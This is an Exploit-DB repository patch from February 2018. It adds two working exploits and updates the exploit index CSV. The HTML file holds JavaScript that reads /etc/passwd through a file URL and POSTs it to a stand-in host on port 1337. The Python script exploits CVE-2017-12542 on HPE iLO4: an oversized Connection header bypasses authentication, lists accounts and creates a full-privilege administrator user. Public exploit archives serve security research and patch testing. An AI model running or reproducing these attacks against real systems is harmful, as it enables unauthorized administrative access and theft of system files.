From 79b9c08b88e20b85fc5a59e02f9dac681bcc7b35 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 9 Feb 2018 05:01:51 +0000
Subject: [PATCH] DB: 2018-02-09

2 changes to exploits/shellcodes

Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow
Abuse-SDL 0.7 - Command Line Argument Buffer Overflow

MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()
MuPDF 1.3 - 'xps_parse_color()' Stack Buffer Overflow

Marked2 - Local File Disclosure

HPE iLO4 < 2.53 - Add New Administrator User
---
 exploits/multiple/local/44006.html |  20 +++++
 exploits/multiple/remote/44005.py  | 114 +++++++++++++++++++++++++++++
 files_exploits.csv                 |   6 +-
 3 files changed, 138 insertions(+), 2 deletions(-)
 create mode 100644 exploits/multiple/local/44006.html
 create mode 100755 exploits/multiple/remote/44005.py

diff --git a/exploits/multiple/local/44006.html b/exploits/multiple/local/44006.html
new file mode 100644
index 000000000..2947c02c0
--- /dev/null
+++ b/exploits/multiple/local/44006.html
@@ -0,0 +1,20 @@
+<body>
+<script>
+var file = "file:///etc/passwd";
+var extract = "http://dev.example.com:1337/";
+function get(url) {
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open("GET", url, false);
+ xmlHttp.send(null);
+ return xmlHttp.responseText;
+}
+function steal(data) {
+ var xhr = new XMLHttpRequest();
+ xhr.open('POST', extract, true);
+ xhr.onload = function() {};
+ xhr.send(data);
+}
+var cdl = get(file);
+steal(cdl);
+</script>
+</body>
\ No newline at end of file
diff --git a/exploits/multiple/remote/44005.py b/exploits/multiple/remote/44005.py
new file mode 100755
index 000000000..d2fc26c66
--- /dev/null
+++ b/exploits/multiple/remote/44005.py
@@ -0,0 +1,114 @@
+#!/usr/bin/env python
+
+"""
+Exploit trigger was presented @reconbrx 2018
+
+Vulnerability found and documented by synacktiv:
+https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html
+
+Original advisory from HP:
+https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
+
+Other advisories for this CVE:
+https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
+https://securitytracker.com/id/1039222
+
+IMPORTANT: 
+THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
+The two other vulns are critical as well, but only triggerable on the host itself.
+
+
+"""
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import json
+import urllib3
+
+#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert 
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+exploit_trigger = {'Connection' : 'A'*29}
+accounts_url = 'https://%s/rest/v1/AccountService/Accounts'
+
+
+
+def test(ip):
+	
+	url = accounts_url % ip
+	try:
+		response = requests.get(url, headers = exploit_trigger, verify = False)
+	except Exception as e:
+		return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
+
+	try:
+		data = json.loads(response.text)
+	except Exception as e:
+		return False, 'Target response not as exected!, Exception data: %s' % (str(e),)
+
+	return True, data
+
+def exploit(ip, username, password):
+	Oem = {
+		'Hp' : {
+			'LoginName' : username,
+			'Privileges': {
+				'LoginPriv' : True,
+				'RemoteConsolePriv': True,
+				'UserConfigPriv' : True,
+				'VirtualMediaPriv': True,
+				'iLOConfigPriv':True,
+				'VirtualPowerAndResetPriv':True,
+			}
+		}
+	}
+	body = {
+		'UserName':username,
+		'Password':password,
+		'Oem':Oem
+	}
+	url = accounts_url % ip
+
+
+
+	try:
+		response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
+	except Exception as e:
+		return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
+
+	if response.status_code in [requests.codes.ok, requests.codes.created]:
+		return True, response.text
+	else:
+		return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)
+
+if __name__ == '__main__':
+	import argparse
+	import sys
+	parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
+	parser.add_argument('ip', help='target IP')
+	parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
+	parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
+	parser.add_argument('-u', help='username of the new admin user')
+	parser.add_argument('-p', help='password of the new admin user')
+
+	args = parser.parse_args()
+
+	if args.e:
+		if args.u is None or args.p is None:
+			print('Username and password must be set for exploiting!')
+			sys.exit()
+		res, data = exploit(args.ip, args.u, args.p)
+		if res:
+			print('[+] Sucsessfully added user!')
+		else:
+			print('[-] Error! %s' % data)
+
+	elif args.t:
+		res, data = test(args.ip)
+		if res:
+			print('[+] Target is VULNERABLE!')
+			for i in data['Items']:
+				print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
+		else:
+			print('[-] Error! %s' % data)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0083442c7..755d55e05 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -8257,7 +8257,7 @@ id,file,description,date,author,type,platform,port
 22779,exploits/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",local,windows,
 22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",local,linux,
 22806,exploits/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,local,linux,
-22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd,
+22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd,
 22813,exploits/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,local,linux,
 22815,exploits/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,local,linux,
 40409,exploits/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",local,windows,
@@ -8652,7 +8652,7 @@ id,file,description,date,author,type,platform,port
 30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",local,linux,
 30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows,
 31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",local,windows,
-31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows,
+31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - 'xps_parse_color()' Stack Buffer Overflow",2014-01-20,"Jean-Jamil Khalife",local,windows,
 31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow",2008-02-12,forensec,local,linux,
 31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",local,windows,
 31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,local,linux,
@@ -9319,6 +9319,7 @@ id,file,description,date,author,type,platform,port
 43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
 43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
 43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
+44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -16005,6 +16006,7 @@ id,file,description,date,author,type,platform,port
 44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
 44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
+44005,exploits/multiple/remote/44005.py,"HPE iLO4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22